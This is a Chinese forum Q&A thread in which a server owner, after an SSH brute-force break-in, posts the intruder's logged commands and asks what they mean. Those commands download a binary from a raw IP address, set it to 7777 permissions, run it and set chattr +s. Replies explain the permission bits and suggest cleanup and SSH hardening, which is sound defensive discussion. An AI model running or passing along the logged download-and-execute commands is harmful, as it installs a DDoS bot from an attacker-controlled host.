V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
yinjian
V2EX  ›  问与答

站点密码被暴力破解留下了操作记录,有几个命令不是太理解

  •  
  •   yinjian · 2014-06-27 16:20:24 +08:00 · 7322 次点击
    这是一个创建于 3829 天前的主题,其中的信息可能已经有所发展或是发生改变。
    wget http://122.224.32.32:51/prfos
    chmod 7777 ./prfos
    ./prfos
    chattr +s /tmp/prfos

    chmod 7777是干嘛用的,一般不都是777吗?多的一位用意是?
    prfos我看了下是二进制文件。后面直接运行后chattr是什么用意?
    我现在改密码后将prfos删了能保证该代码不再运行了吗?
    该主机从没设域名只有内部使用,黑客是如何扫描到的,并判断出该主机上有这个账号的?
    =======
    登录的两次ip
    58.83.131.67 北京市 世纪互联
    60.190.139.34 浙江省嘉兴市 电信
    第 1 条附言  ·  2014-06-27 17:19:29 +08:00

    附上7天的监控图
    第 2 条附言  ·  2014-06-27 23:24:25 +08:00
    使用 @xi4oh4o 大大推荐的rkhunter扫描了下,暂时没看出什么大问题。有些waring我也不是太确定,筛选带有waring的贴一下。
    checking system commands.
    Performing file properties checks
    Checking for prerequisites [ Warning ]
    /usr/sbin/adduser [ Warning ]
    /usr/bin/ldd [ Warning ]
    /bin/which [ Warning ]

    Performing system configuration file checks
    Checking if SSH root access is allowed [ Warning ]
    Checking if syslog remote logging is allowed [ Warning ]

    Performing filesystem checks
    Checking /dev for suspicious file types [ Warning ]
    Checking for hidden files and directories [ Warning ]

    Checking application versions...
    Checking version of GnuPG [ Warning ]
    Checking version of OpenSSL [ Warning ]
    Checking version of OpenSSH [ Warning ]
    16 条回复    2014-06-28 03:05:36 +08:00
    letitbesqzr
        1
    letitbesqzr  
       2014-06-27 16:38:43 +08:00
    一般是批量集群ddos的马..
    9hills
        2
    9hills  
       2014-06-27 16:50:20 +08:00
    就不能重装下系统?删了继续跑,真是胆大
    jamesxu
        3
    jamesxu  
       2014-06-27 16:53:01 +08:00
    loginv2
        4
    loginv2  
       2014-06-27 17:02:51 +08:00
    7777 setuid
    prfos 估计是个后门之类的东西,对系统做了某些操作
    然后彻底删除这个文件 (用0填充掉)
    loginv2
        5
    loginv2  
       2014-06-27 17:04:07 +08:00
    而且,因为有HTTP服务,所以被中途抓包 或者登陆者机器的某些软件记录了操作也有可能 薄弱环节无处不在
    passluo
        6
    passluo  
       2014-06-27 17:05:24 +08:00
    ddos马
    yinjian
        7
    yinjian  
    OP
       2014-06-27 17:34:27 +08:00
    ubuntu下清ddos马有成熟点的方案没,比如类似win下的杀毒软件之类的工具?
    wubaiqing
        8
    wubaiqing  
       2014-06-27 18:45:10 +08:00   ❤️ 1
    chmod 7777 特殊权限S


    SBIT为1
    只对目录有效,使目录下的文件,只有文件拥有者才能删除
    如果他不属于owner,仅属于group或者other,就算他有w权限,也不能删除文件

    SGID为2
    表示运行这个程序时,是临时以这个文件的拥有组的身份运行的;
    加上SGID的文件夹,表示在这个目录下创建的文件属于目录所有的组,而不是创建人所在的组,在这个目录下创建的目录继承本目录的SGID。

    SUID为4
    SUID与SGID是一样的,惟一不同的是,运行时是以这个文件的拥有者身份来运行。
    wubaiqing
        9
    wubaiqing  
       2014-06-27 18:48:41 +08:00   ❤️ 1
    chattr +s /tmp/prfos

    附加属性:
    s:彻底删除文件,不可恢复。
    因为是从磁盘上删除,然后用0填充文件所在区域。
    xi4oh4o
        10
    xi4oh4o  
       2014-06-27 19:36:23 +08:00   ❤️ 1
    检查一下 crontab -l

    这个开源工具十分好用 http://rootkit.nl/projects/rootkit_hunter.html
    tmqhliu
        11
    tmqhliu  
       2014-06-27 23:52:34 +08:00
    几点建议

    修改SSH配置,不要在22端口上运行,否则容易被区段扫描,碰上弱密码就攻破了
    SSH配置不得允许 root 直接登录,只能允许普通用户登录,然后用 su 切换用户
    扫描显示有warning的文件,最好详细检查是否有问题,如果不能判断,一律认为有后门,果断找干净版本替换,甚至重装
    halczy
        12
    halczy  
       2014-06-28 00:00:58 +08:00
    @tmqhliu

    非22端口SSH用久了会被GFW.

    可以安装FAIL2BAN来自动封IP, 防止暴力破解.
    johnnyR
        13
    johnnyR  
       2014-06-28 00:22:04 +08:00
    @tmqhliu 我也很担心。我的是12.04版的。我还开了3389.我设置了密码22位= =不知道安全不
    9hills
        14
    9hills  
       2014-06-28 00:31:51 +08:00 via iPad
    @halczy
    @johnnyR
    @tmqhliu 禁止密码登录,只用密钥,表示随便扫,什么failban完全不用。。
    lyragosa
        15
    lyragosa  
       2014-06-28 00:33:39 +08:00
    @halczy 我了个去,还有这个说法吗……
    CupTools
        16
    CupTools  
       2014-06-28 03:05:36 +08:00
    改SSH口+CSF+OSSEC
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2802 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 06:16 · PVG 14:16 · LAX 22:16 · JFK 01:16
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.